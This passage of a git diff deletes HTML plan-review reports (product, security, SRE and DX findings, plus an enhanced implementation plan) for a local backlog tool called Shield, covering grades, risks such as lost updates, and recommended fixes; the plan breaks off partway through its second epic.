-<tr>
-<td>DX12</td>
-<td>CI/CD integration</td>
-<td>B+</td>
-<td>Path glob named, but CI entrypoint still a task, not a value.</td>
-</tr>
-<tr>
-<td>DX13</td>
-<td>Error handling patterns</td>
-<td>A</td>
-<td>Failure modes enumerated per component; never-remove-on-doubt.</td>
-</tr>
-<tr>
-<td>DX14</td>
-<td>Configuration management</td>
-<td>A−</td>
-<td>One config key fully specified; recovery log path defined.</td>
-</tr>
-<tr>
-<td>DX15</td>
-<td>Developer onboarding</td>
-<td>B+</td>
-<td>Dry-run loop mandated but not yet written.</td>
-</tr>
-</tbody>
-</table>
-<h2 id="findings">Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>DX10</td>
-<td>Pin the <code>manifest.json</code> read-contract in TRD §11 (exact keys read + example) so EPIC-2-S1/EPIC-3-S2 don't reverse-engineer the live file. (Overlaps backend P0-1.)</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>DX12</td>
-<td>Resolve the CI entrypoint to a concrete value (the actual workflow file + runner), not a task, so the eval-gate AC is verifiable.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX4/DX15</td>
-<td>Replace &quot;e.g. monthly&quot; audit cadence with a fixed interval + numeric trigger (lift PRD §7 thresholds verbatim).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX7/DX15</td>
-<td>State runtime prereqs once in the backlog SKILL.md (Python ≥3.x via uv; validator uses pydantic+jsonschema).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>DX1</td>
-<td>Label the two composites inline — PRD-review 3.12 vs plan-review 3.14 — to avoid a misread in the plan.md header.</td>
-</tr>
-</tbody>
-</table>
-<p>No P0 findings from DX: the deferred TRD is present and complete, the prior P0 (gate-0d) is folded, locked decisions propagate consistently, every story has self-contained ACs.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html
deleted file mode 100644
index dfa5731a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/product-manager.html
+++ /dev/null
@@ -1,109 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="product-manager--detailed-findings-pm1pm10-decomposed">Product Manager — Detailed Findings (PM1–PM10 decomposed)</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A</strong> (average of 10 dim grades = 3.6). Dispatched as 10 parallel dim subagents per the pm-restructure-v0 registry.</p>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Severity</th>
-<th>Grade</th>
-<th>Gap / note</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>PM1</td>
-<td>User impact clarity</td>
-<td>Critical</td>
-<td>A</td>
-<td>Named personas (P1 Ashwini/maintainer, P2 the agent); concrete impact; §7 numeric magnitude.</td>
-</tr>
-<tr>
-<td>PM2</td>
-<td>Problem-solution fit</td>
-<td>Critical</td>
-<td>A</td>
-<td>&quot;nowhere to park that work&quot; → ordered store + reconciliation directly fits.</td>
-</tr>
-<tr>
-<td>PM3</td>
-<td>Scope discipline (plan)</td>
-<td>Important</td>
-<td>A</td>
-<td>Explicit out-of-scope (hooks, per-feature, state machine, pm-sync, locking) + §8 alternatives + validate-the-bet gate. Opposite of kitchen-sink.</td>
-</tr>
-<tr>
-<td>PM4</td>
-<td>Prioritization rationale</td>
-<td>Important</td>
-<td>B</td>
-<td>Sequencing + named deps + PM10 value-gate present, but <strong>no effort/impact estimates per phase</strong>; priorities nearly all &quot;high&quot;.</td>
-</tr>
-<tr>
-<td>PM5</td>
-<td>Stakeholder communicability</td>
-<td>Important</td>
-<td>B</td>
-<td>TRD &quot;In one line&quot; + PRD §3 give a plain entry point, but docs are otherwise pervasively engineering-framed; <strong>no dedicated stakeholder/executive summary</strong>.</td>
-</tr>
-<tr>
-<td>PM6</td>
-<td>Market / competitive awareness</td>
-<td>Warning</td>
-<td>B</td>
-<td>PM-tool backlog named as incumbent + differentiated, but the <strong>buy-vs-build case is asserted, not reasoned</strong>.</td>
-</tr>
-<tr>
-<td>PM7</td>
-<td>Adoption &amp; rollout risk</td>
-<td>Important</td>
-<td>A</td>
-<td>Capture-friction risk + mitigation; the no-hooks bet surfaced as an unvalidated assumption.</td>
-</tr>
-<tr>
-<td>PM8</td>
-<td>Success metrics</td>
-<td>Important</td>
-<td>A</td>
-<td>Four §7 metrics, three with numeric thresholds + counters; manual measurement mechanism named (no telemetry).</td>
-</tr>
-<tr>
-<td>PM9</td>
-<td>Reversibility &amp; exit cost</td>
-<td>Warning</td>
-<td>A</td>
-<td>TRD §14 graded exit ramp (kill switch → revert/replay → PR back-out) tied to observable triggers.</td>
-</tr>
-<tr>
-<td>PM10</td>
-<td>Business value alignment</td>
-<td>Critical</td>
-<td>B</td>
-<td>Tied to real operational pain + measurable outcome, but the <strong>load-bearing value premise is explicitly unvalidated (no baseline)</strong> and links to internal-workflow pain, not a named OKR.</td>
-</tr>
-</tbody>
-</table>
-<h2 id="consolidated-pm-recommendations-p2">Consolidated PM recommendations (P2)</h2>
-<ul>
-<li><strong>PM4:</strong> add a coarse effort estimate (t-shirt/points) + one-line impact per milestone so M1→M2→M3 is justified by impact-per-effort, not dependency chains alone.</li>
-<li><strong>PM5:</strong> add a 3–4 sentence stakeholder/executive summary near the top of the PRD (or promote the TRD one-liner) stating what + business-why in plain language before the jargon.</li>
-<li><strong>PM6:</strong> add 1–2 sentences making the buy-vs-build case explicit — why the ClickUp/Jira backlog can't serve as the pre-pipeline staging area (not co-located with manifest.json/plan.json, no reconciliation against Shield artifacts, would pollute the PM board of record).</li>
-<li><strong>PM10:</strong> state the operational cost the tool recovers in concrete terms (ideas lost/re-derived per week, or maintainer re-scoping time) so the &quot;justifies the tool&quot; bet has a falsifiable target the 30-day v1 audit can measure against.</li>
-</ul>
-<p>No P0/P1 from the PM persona — all four sub-B dims are Important/Warning-severity B grades (→ P2).</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html
deleted file mode 100644
index da925030..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/security-engineer.html
+++ /dev/null
@@ -1,170 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="security-engineer--detailed-findings">Security Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A−.</strong> Security-mature for its surface (single-actor local tool over a plaintext git-tracked store of developer idea text — no PII/auth/network). Threat model is honest, trust boundaries are clean, and security claims are pinned to executable, falsifiable ACs. The four folded prior-review findings are all present, correctly threat-framed, and sufficient. Lands A− (not A) because the recovery layer (N4) and single-writer claim (N5) rest on ordering/assumption guarantees not yet pinned to tests.</p>
-<h2 id="folded-finding-verification">Folded-finding verification</h2>
-<table>
-<thead>
-<tr>
-<th>Folded finding</th>
-<th>Sufficient?</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>Malformed/partial read refused with <code>BacklogInvalid</code> (F5)</td>
-<td>Yes — &quot;single integrity primitive&quot; (TRD §9), concrete AC</td>
-</tr>
-<tr>
-<td>Concurrency eval: no corruption AND no lost entry</td>
-<td>Yes — correctly distinguishes lost-entry (RMW race) from corruption (crash mid-write)</td>
-</tr>
-<tr>
-<td>No-stamping eval (F6): plan.json byte-unchanged</td>
-<td>Yes — byte-unchanged is the right assertion</td>
-</tr>
-<tr>
-<td>Epic-name collision across features → ambiguous → stays</td>
-<td>Yes — fixture exists (ambiguous-match-stays)</td>
-</tr>
-</tbody>
-</table>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>SE1</td>
-<td>Threat model coverage</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>SE2</td>
-<td>Least-privilege design</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE3</td>
-<td>Data protection</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE4</td>
-<td>Secrets management</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE5</td>
-<td>Network security</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td>SE6</td>
-<td>Access control</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td>SE7</td>
-<td>Compliance</td>
-<td>N/A</td>
-</tr>
-<tr>
-<td>SE8</td>
-<td>Incident response</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>SE9</td>
-<td>Acceptance criteria quality</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE10</td>
-<td>Edge case &amp; rollback coverage</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>SE11</td>
-<td>Integration test strategy</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE12</td>
-<td>Regression risk</td>
-<td>A</td>
-</tr>
-<tr>
-<td>SE13</td>
-<td>Environment validation</td>
-<td>B+</td>
-</tr>
-<tr>
-<td>SE14</td>
-<td>Security validation</td>
-<td>A−</td>
-</tr>
-</tbody>
-</table>
-<h2 id="findings">Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>SE10/SE1 (P1-a)</td>
-<td>No detection for a violated single-writer assumption (N5). If violated, the outcome is a silent lost update. Add a cheap compare-before-replace: <code>capture()</code>/<code>remove()</code> carry the schema_version+entry-count (or mtime/hash) read at start and refuse <code>os.replace()</code> if the on-disk file changed underneath — converts a silent lost-update into a loud <code>BacklogInvalid</code> refusal <strong>without a lockfile</strong>. (Also resolves backend P1-1.)</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>SE14/SE9 (P1-b)</td>
-<td>Write-side validation is asserted (&quot;validate-or-refuse on read/write&quot;) but only read-side + crash-mid-write are tested. Add AC+eval: &quot;<code>capture()</code> that would produce a schema-invalid document raises <code>BacklogInvalid</code> and leaves backlog.json byte-unchanged (no .tmp promoted).&quot;</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>SE10/SE14 (P1-c)</td>
-<td>The recovery-sink ordering (append-before-remove) is stated in prose but not pinned to a test. Strengthen the recovery-rehearsal eval to assert recoverability across a simulated crash at the ordering seam (after append/before remove; after remove/before commit).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE1/SE8 (P2-a)</td>
-<td><code>.shield/backlog-removed.log</code> is a new write surface with no integrity story (no schema, no validate-or-refuse, git-tracked status unspecified). Specify tracked/ignored + read it back through a defined parser in the recovery eval.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE13 (P2-b)</td>
-<td>Dry-run isolation is a doc task, not a guarded invariant; the lazy sweep runs on every view. Make dry-run/fixture mode provably non-destructive (force kill switch off, or disable sweep when a fixture path is supplied) + add to the eval matrix.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>SE1 (P2-c)</td>
-<td>Migration is doc-only (correct for v1); add a forward note that any future <code>migrate()</code> must itself be validate-or-refuse (a half-migrated write is the next corruption vector).</td>
-</tr>
-</tbody>
-</table>
-<p>No P0 findings from security.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html
deleted file mode 100644
index f342c0aa..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/sre.html
+++ /dev/null
@@ -1,145 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="sre--operations--detailed-findings">SRE / Operations — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A−.</strong> Operationally mature: all four prior SRE findings landed with verbatim fidelity; failure-mode analysis is genuinely strong (safe-failure direction is explicit and testable). Remaining risk is concentrated in the N4 recovery path.</p>
-<h2 id="prior-finding-verification">Prior-finding verification</h2>
-<table>
-<thead>
-<tr>
-<th>Finding</th>
-<th>Landed?</th>
-<th>Sufficient?</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>OP1 — log every removal with rationale <code>{entry id, feature, epic, match-kind, triggering run, gating plan.json path}</code></td>
-<td>Yes (TRD §5 F9, EPIC-3-S2, lld-reconciler §10)</td>
-<td>Yes — elevated to single integrity surface (TRD §9)</td>
-</tr>
-<tr>
-<td>OP7 — kill switch</td>
-<td>Yes (TRD §5 F10, §14, EPIC-3-S3, lld-reconciler §9)</td>
-<td>Mostly — see P2-1: a single boolean disables <strong>both</strong>; &quot;independently&quot; is not actually delivered</td>
-</tr>
-<tr>
-<td>OP4 — uncommitted-state recovery gap</td>
-<td>Yes (TRD §6 N4, §9, §14, EPIC-3-S3, lld-reconciler §8)</td>
-<td>Yes for eager path; see P1-1 — the OR is unresolved</td>
-</tr>
-<tr>
-<td>OP2/OP5 — N2 latency instrumented</td>
-<td>Yes (TRD §6 N2, EPIC-3-S3, lld-reconciler §10/§12.4)</td>
-<td>Yes — wired to a §14 rollback trigger</td>
-</tr>
-</tbody>
-</table>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>OP1</td>
-<td>Observability plan</td>
-<td>A</td>
-</tr>
-<tr>
-<td>OP2</td>
-<td>Monitoring &amp; alerting</td>
-<td>B</td>
-</tr>
-<tr>
-<td>OP3</td>
-<td>Failure mode analysis</td>
-<td>A</td>
-</tr>
-<tr>
-<td>OP4</td>
-<td>Backup &amp; recovery</td>
-<td>B+</td>
-</tr>
-<tr>
-<td>OP5</td>
-<td>Capacity planning</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>OP6</td>
-<td>Change management</td>
-<td>A</td>
-</tr>
-<tr>
-<td>OP7</td>
-<td>On-call readiness</td>
-<td>B+</td>
-</tr>
-</tbody>
-</table>
-<h2 id="findings">Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>OP4 (P1-1)</td>
-<td>N4 recovery mechanism is an unresolved OR with divergent semantics (commit-before-prune → <code>git revert</code>, vs removed-log → replay). The §14 runbook can't be written precisely. Pick one v1 default — recommend removed-log (avoids forcing a possibly-dirty-tree commit on every prune; decouples recovery from git state, which matters mid-<code>/implement</code>). Make the other an explicit non-goal; update EPIC-3-S3 AC + §14 step 2.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP7 (P2-1)</td>
-<td>Kill switch doesn't disable triggers &quot;independently&quot; — one coupled boolean. Drop the &quot;independently&quot; framing (coupled is the right v1 scope) or split into <code>auto_reconcile.eager</code>/<code>.lazy</code>.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP2 (P2-2)</td>
-<td>Wrong-removal detection is pull-only (operator must read the log). Have <code>/backlog view</code> surface &quot;N entries removed since last view (see backlog-removed.log)&quot; when the log grows.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP4 (P2-3)</td>
-<td>Removed-log lifecycle undefined (git-tracked vs gitignored, rotation, max size). Specify — and the tracked/ignored choice ties to P1-1.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP7 (P2-4)</td>
-<td>EPIC-4-S2 AC lists feature docs for SKILL.md but not the recovery procedure. Add: SKILL.md documents wrong-removal recovery (flip kill switch → locate F9 log line → revert/replay).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP7 (P2-5)</td>
-<td>Audit interval still &quot;e.g. monthly&quot; — commit to an actual interval.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP1 (P2-6)</td>
-<td>Specify no-op eager prune logging (if lazy sweep beat it): &quot;no-op prune emits no log line&quot; to avoid duplicate recovery records.</td>
-</tr>
-</tbody>
-</table>
-<p>No P0 findings.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html
deleted file mode 100644
index 1983554a..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/enhanced-plan.html
+++ /dev/null
@@ -1,207 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<!-- sidecar: ../../../plan.json -->
-<!-- enhanced by /plan-review on 2026-05-29 — P0/P1 fixes folded into affected stories -->
-<h1 id="plan--shield-backlog-enhanced-2026-05-29">Plan — Shield Backlog (enhanced 2026-05-29)</h1>
-<p><strong>Project:</strong> Shield · <strong>Phase:</strong> v1 · <strong>Domain:</strong> backend (Python)
-<strong>PRD:</strong> <a href="../../../prd.md"><code>prd.md</code></a> (PRD-review <strong>Ready</strong>, composite 3.12) · <strong>TRD:</strong> <a href="../../../trd.md"><code>trd.md</code></a> · <strong>Sidecar:</strong> <a href="../../../plan.json"><code>plan.json</code></a>
-<strong>Plan-review:</strong> Ready, composite 3.49 (B+) — conditional on the 3 P0 fixes below.</p>
-<blockquote>
-<p><strong>Changes applied in this enhanced version</strong> (review 2026-05-29):</p>
-<ul>
-<li><strong>P0-1 / P0-2 / P0-3</strong> folded into EPIC-3-S2, EPIC-3-S3, EPIC-1-S1, and a new schema task.</li>
-<li><strong>P1s</strong> (recovery-OR resolution, lost-update detection, dup-id wording, name==slug, packaging, CI entrypoint, write-side + ordering-seam evals) folded into the affected stories.</li>
-<li>P2s recorded as inline <code>[P2]</code> notes for the implementer to pick up opportunistically.</li>
-</ul>
-</blockquote>
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Depends on</th>
-<th>Touches LLD</th>
-<th>Outcome</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>—</td>
-<td><code>backlog-store</code></td>
-<td><code>backlog.json</code> + schema/validator; capture (user + skill, atomic, validate-or-refuse, lost-update detection); <code>/backlog</code> ordered view with manifest status badges; manual remove.</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>M1</td>
-<td><code>epic-suggester</code></td>
-<td>Every entry carries feature + epic; agent suggests via exact-normalized match against the pinned manifest/plan shapes; user accept/replace/create-new.</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>M2</td>
-<td><code>reconciler</code></td>
-<td>Promotion via transient reference; reconciliation engine (single &quot;epic landed&quot; predicate matching existing epics by <strong>name</strong>, never-remove-on-doubt, drift tolerance, removal logging); eager + lazy idempotent triggers + kill switch (incl. <code>.shield.json</code> schema change); eval suite + version bump.</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="epic-1--store-schema--capture--m1">EPIC-1 — Store, schema &amp; capture  <em>(M1)</em></h2>
-<h3 id="epic-1-s1--define-backlogjson-schema-and-validator-high">EPIC-1-S1 · Define backlog.json schema and validator <em>(high)</em></h3>
-<p>Define <code>backlog.json</code> shape + JSON Schema with a top-level <code>schema_version</code>, plus a Python validator. Entry: <code>{id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}</code>.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/schema/backlog.schema.json</code>; <code>id</code> = <code>uuid4</code> string; document entry shape + migration policy (doc-only until <code>schema_version</code> 2) in <code>shield/skills/general/backlog/SKILL.md</code>; create <code>shield/scripts/validate_backlog.py</code>; ordering = single integer <code>order</code>.
-<ul>
-<li><strong>[P1-2 — fix]</strong> Uniqueness of <code>id</code> across <code>entries[]</code> is enforced by <strong><code>validate_backlog.py</code></strong> (named error <code>duplicate_entry_id</code>), <strong>not</strong> by the JSON Schema — draft 2020-12 <code>uniqueItems</code> is whole-item equality and cannot express property-level uniqueness. Reword F2 + the AC accordingly.</li>
-<li><strong>[P1-3 — fix]</strong> Document the invariant <strong><code>manifest features[].name</code> == feature folder slug</strong> (the reconciliation key) in the SKILL.md, since suggestion + reconciliation both rely on it.</li>
-<li><strong>[P2]</strong> State runtime prereqs once (Python ≥3.x via uv; validator uses pydantic + jsonschema).</li>
-</ul>
-</li>
-<li><strong>AC:</strong> schema rejects unknown <code>kind</code>/<code>source</code> (named error); <strong>the validator</strong> rejects duplicate <code>id</code> (<code>duplicate_entry_id</code>); <code>validate_backlog.py</code> exits 0/non-zero correctly; <code>schema_version</code> + migration policy present; <code>id</code> is a <code>uuid4</code> string.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#apis-involved">TRD §11 APIs Involved</a> · LLD <a href="../../../lld-backlog-store.md#data-model"><code>backlog-store</code> §4 Data model</a></li>
-</ul>
-<h3 id="epic-1-s2--capture-entrypoint-user--skill-with-atomic-write--lost-update-detection-high">EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write + lost-update detection <em>(high)</em></h3>
-<p>Capture usable by the user (<code>/backlog add</code>) and any skill (documented <code>capture()</code> helper). Atomic temp-then-rename + validate-or-refuse.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>/backlog add</code> (assigns next <code>order</code> + <code>uuid4</code> id); <strong>LOCKED</strong> signature <code>capture(text, *, kind=&quot;task&quot;, feature=None, epic=None, source) -&gt; str</code> in <code>shield/scripts/backlog_store.py</code>, raising <code>BacklogInvalid</code>; <strong>LOCKED</strong> single-writer (no lock) → full doc → <code>.tmp</code> → <code>os.replace()</code>.
-<ul>
-<li><strong>[P1-1 — fix]</strong> Add <strong>compare-before-replace</strong>: <code>capture()</code>/<code>remove()</code> capture the on-disk <code>schema_version</code>+entry-count (or mtime/hash) at read time and refuse the <code>os.replace()</code> if the file changed underneath, raising <code>BacklogInvalid</code>. Converts a silent lost-update (the real N1/N5 threat) into a loud refusal <strong>without a lockfile</strong>.</li>
-<li><strong>[P1-4 — fix]</strong> Package <code>backlog_store</code> as an importable module with a <code>pyproject.toml</code> (F3 requires skills to import <code>capture()</code>); document the import path. Makes the EPIC-4-S2 version bump unconditional.</li>
-<li><strong>[P2]</strong> <code>os.fsync()</code> the temp fd before <code>os.replace()</code>; use a unique <code>.tmp</code> suffix (pid/uuid). Consider <code>read() -&gt; BacklogDoc</code> (pydantic) over raw dict.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> user + skill capture both work; interface documented + pinned in TRD §11; mid-write kill leaves no corruption; <strong>a concurrent on-disk change between read and replace is refused with <code>BacklogInvalid</code> (no lost entry)</strong>; malformed/partial read refused with <code>BacklogInvalid</code>.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#functional-requirements">TRD §5 Functional Requirements</a> · LLD <a href="../../../lld-backlog-store.md#api-contracts"><code>backlog-store</code> §5 API contracts</a></li>
-</ul>
-<h3 id="epic-1-s3--backlog-view--ordered-list-high">EPIC-1-S3 · /backlog view — ordered list <em>(high)</em></h3>
-<p><code>/backlog</code> command + skill rendering entries sorted by <code>order</code> with feature + epic + source.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/commands/backlog.md</code> + <code>backlog/SKILL.md</code>; render sorted; define render-line format once; document a <strong>provably non-destructive</strong> local-dev/dry-run loop; empty-backlog message.
-<ul>
-<li><strong>[P2 — security]</strong> Dry-run/fixture mode MUST force the lazy sweep off (the sweep runs on every real view) so testing a fixture can't mutate the project store.</li>
-</ul>
-</li>
-<li><strong>AC:</strong> ascending-<code>order</code> list with feature/epic/source; clean empty message; command registered; dry-run mode runs no sweep against the project store.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#product-journey">TRD §4 Product Journey</a></li>
-</ul>
-<h3 id="epic-1-s4--manual-remove-from-backlog-medium">EPIC-1-S4 · Manual remove from /backlog <em>(medium)</em></h3>
-<p><code>/backlog remove &lt;id&gt;</code> — plain delete.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>remove &lt;id&gt;</code> via atomic helper; confirm-before-delete; clear error on absent id; document the recoverability boundary (uncommitted manual remove is unrecoverable by design — N4).</li>
-<li><strong>AC:</strong> deletes + persists atomically; absent id = clear no-op error; no history retained.</li>
-<li><strong>Design:</strong> <a href="../../../trd.md#functional-requirements">TRD §5 Functional Requirements</a> · LLD <a href="../../../lld-backlog-store.md#api-contracts"><code>backlog-store</code> §5 API contracts</a></li>
-</ul>
-<hr />
-<h2 id="epic-2--association--pipeline-status--epic-2-deliberately-straddles-m1m2--see-note">EPIC-2 — Association &amp; pipeline status  <em>(EPIC-2 deliberately straddles M1/M2 — see note)</em></h2>
-<blockquote>
-<p><strong>[P2 — agile]</strong> EPIC-2-S1 (status badges) ships with the M1 view; EPIC-2-S2 (association + suggestion) is the M2 deliverable. This straddle is intentional, not a numbering slip.</p>
-</blockquote>
-<h3 id="epic-2-s1--per-entry-pipeline-status-from-manifestjson-high-m1">EPIC-2-S1 · Per-entry pipeline status from manifest.json <em>(high, M1)</em></h3>
-<ul>
-<li><strong>Tasks:</strong> read manifest; render status badges; pin badge string <code>research ✓  prd ✓  plan –</code>; <code>not started</code> when feature absent; compute at view time.
-<ul>
